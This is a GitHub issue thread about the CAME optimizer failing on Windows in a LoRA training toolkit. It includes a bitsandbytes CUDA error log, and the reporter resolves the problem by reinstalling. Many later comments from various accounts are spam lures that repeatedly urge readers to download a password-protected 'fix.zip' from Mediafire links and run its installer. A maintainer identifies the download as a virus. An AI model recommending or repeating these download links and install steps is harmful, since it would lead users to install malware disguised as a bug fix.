### ISSUE TITLE
CAME optimizer does not work on windows

### ISSUE THREAD

**Issue by qxces** [derrian-distro/LoRA_Easy_Training_Scripts#235]
When I try to use CAME Optimiser I get the following error. Not sure if this problem applies to Easy Training Scripts.

```
===================================BUG REPORT===================================
Welcome to bitsandbytes. For bug reports, please submit your error trace to: https://github.com/TimDettmers/bitsandbytes/issues
================================================================================
binary_path: G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\bitsandbytes\cuda_setup\libbitsandbytes_cuda116.dll
CUDA SETUP: Loading binary G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\bitsandbytes\cuda_setup\libbitsandbytes_cuda116.dll...
Could not find module 'G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\bitsandbytes\cuda_setup\libbitsandbytes_cuda116.dll' (or one of its dependencies). Try using the full path with constructor syntax.
CUDA SETUP: Loading binary G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\bitsandbytes\cuda_setup\libbitsandbytes_cuda116.dll...
Could not find module 'G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\bitsandbytes\cuda_setup\libbitsandbytes_cuda116.dll' (or one of its dependencies). Try using the full path with constructor syntax.
CUDA SETUP: Loading binary G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\bitsandbytes\cuda_setup\libbitsandbytes_cuda116.dll...
Could not find module 'G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\bitsandbytes\cuda_setup\libbitsandbytes_cuda116.dll' (or one of its dependencies). Try using the full path with constructor syntax.
CUDA SETUP: Problem: The main issue seems to be that the main CUDA library was not detected.
CUDA SETUP: Solution 1): Your paths are probably not up-to-date. You can update them via: sudo ldconfig.
CUDA SETUP: Solution 2): If you do not have sudo rights, you can do the following:
CUDA SETUP: Solution 2a): Find the cuda library via: find / -name libcuda.so 2>/dev/null
CUDA SETUP: Solution 2b): Once the library is found add it to the LD_LIBRARY_PATH: export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:FOUND_PATH_FROM_2a
CUDA SETUP: Solution 2c): For a permanent solution add the export from 2b into your .bashrc file, located at ~/.bashrc
                    INFO     [Dataset 0]                                                              train_util.py:2326
                    INFO     caching latents with caching strategy.                                    train_util.py:984
                    INFO     checking cache validity...                                                train_util.py:994
100%|████████████████████████████████████████████████████████████████████████████████| 500/500 [00:10<00:00, 48.89it/s]
2024-08-26 13:40:17 INFO     no latents to cache                                                      train_util.py:1034
2024-08-26 13:40:19|[LyCORIS]-INFO: Weight decomposition is enabled
2024-08-26 13:40:19|[LyCORIS]-INFO: Using rank adaptation algo: locon
2024-08-26 13:40:19|[LyCORIS]-INFO: Use Dropout value: 0.0
2024-08-26 13:40:19|[LyCORIS]-INFO: Create LyCORIS Module
2024-08-26 13:40:19|[LyCORIS]-INFO: Create LyCORIS Module
2024-08-26 13:40:20|[LyCORIS]-INFO: create LyCORIS for Text Encoder: 264 modules.
2024-08-26 13:40:20|[LyCORIS]-INFO: Create LyCORIS Module
2024-08-26 13:40:24|[LyCORIS]-INFO: create LyCORIS for U-Net: 788 modules.
2024-08-26 13:40:24|[LyCORIS]-INFO: module type table: {'LoConModule': 1052}
2024-08-26 13:40:24|[LyCORIS]-INFO: enable LyCORIS for text encoder
2024-08-26 13:40:24|[LyCORIS]-INFO: enable LyCORIS for U-Net
prepare optimizer, data loader etc.
2024-08-26 13:40:24 INFO     use LoraEasyCustomOptimizer.came.CAME | {'weight_decay': 0.08}           train_util.py:4547
CUDA SETUP: Loading binary G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\bitsandbytes\cuda_setup\libbitsandbytes_cuda116.dll...
Could not find module 'G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\bitsandbytes\cuda_setup\libbitsandbytes_cuda116.dll' (or one of its dependencies). Try using the full path with constructor syntax.
CUDA SETUP: Problem: The main issue seems to be that the main CUDA library was not detected.
CUDA SETUP: Solution 1): Your paths are probably not up-to-date. You can update them via: sudo ldconfig.
CUDA SETUP: Solution 2): If you do not have sudo rights, you can do the following:
CUDA SETUP: Solution 2a): Find the cuda library via: find / -name libcuda.so 2>/dev/null
CUDA SETUP: Solution 2b): Once the library is found add it to the LD_LIBRARY_PATH: export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:FOUND_PATH_FROM_2a
CUDA SETUP: Solution 2c): For a permanent solution add the export from 2b into your .bashrc file, located at ~/.bashrc
CUDA SETUP: Problem: The main issue seems to be that the main CUDA library was not detected.
CUDA SETUP: Solution 1): Your paths are probably not up-to-date. You can update them via: sudo ldconfig.
CUDA SETUP: Solution 2): If you do not have sudo rights, you can do the following:
CUDA SETUP: Solution 2a): Find the cuda library via: find / -name libcuda.so 2>/dev/null
CUDA SETUP: Solution 2b): Once the library is found add it to the LD_LIBRARY_PATH: export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:FOUND_PATH_FROM_2a
CUDA SETUP: Solution 2c): For a permanent solution add the export from 2b into your .bashrc file, located at ~/.bashrc
Traceback (most recent call last):
  File "G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\sdxl_train_network.py", line 210, in <module>
    trainer.train(args)
  File "G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\train_network.py", line 475, in train
    optimizer_name, optimizer_args, optimizer = train_util.get_optimizer(args, trainable_params)
  File "G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\library\train_util.py", line 4552, in get_optimizer
    optimizer_module = importlib.import_module(".".join(values[:-1]))
  File "E:\Python\lib\importlib\__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1050, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1027, in _find_and_load
  File "<frozen importlib._bootstrap>", line 1006, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 688, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 883, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\LoraEasyCustomOptimizer\came.py", line 5, in <module>
    from pytorch_optimizer.base.exception import NoSparseGradientError
  File "G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\pytorch_optimizer\__init__.py", line 120, in <module>
    import bitsandbytes as bnb
  File "G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\bitsandbytes\__init__.py", line 7, in <module>
    from .autograd._functions import (
  File "G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\bitsandbytes\autograd\__init__.py", line 1, in <module>
    from ._functions import undo_layout, get_inverse_transform_indices
  File "G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\bitsandbytes\autograd\_functions.py", line 9, in <module>
    import bitsandbytes.functional as F
  File "G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\bitsandbytes\functional.py", line 17, in <module>
    from .cextension import COMPILED_WITH_CUDA, lib
  File "G:\kal\train\LoRA_Easy_Training_Scripts\backend\sd_scripts\venv\lib\site-packages\bitsandbytes\cextension.py", line 22, in <module>
    raise RuntimeError('''
RuntimeError:
        CUDA Setup failed despite GPU being available. Inspect the CUDA SETUP outputs above to fix your environment!
        If you cannot find any issues and suspect a bug, please open an issue with detals about your environment:
        https://github.com/TimDettmers/bitsandbytes/issues
```

I get config from [here](https://github.com/derrian-distro/LoRA_Easy_Training_Scripts/issues/229#issuecomment-2306550556)

**Comment by Jelosus2** [comment]
Does this happen with LoRA too?

**Comment by qxces** [comment]
> Does this happen with LoRA too?

I've tried using other Lora's and it still fails. But it works normally when I change the optimizer.

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jelosus2** [comment]
No, don't, it's a virus

**Comment by Jelosus2** [comment]
> > Does this happen with LoRA too?
> 
> I've tried using other Lora's types and it still fails. But it works normally when I change the optimiser.

Did you use this trainer before or did you do a fresh install?

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qxces** [comment]
I reinstalled the scripts and it works now. Thanks!

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
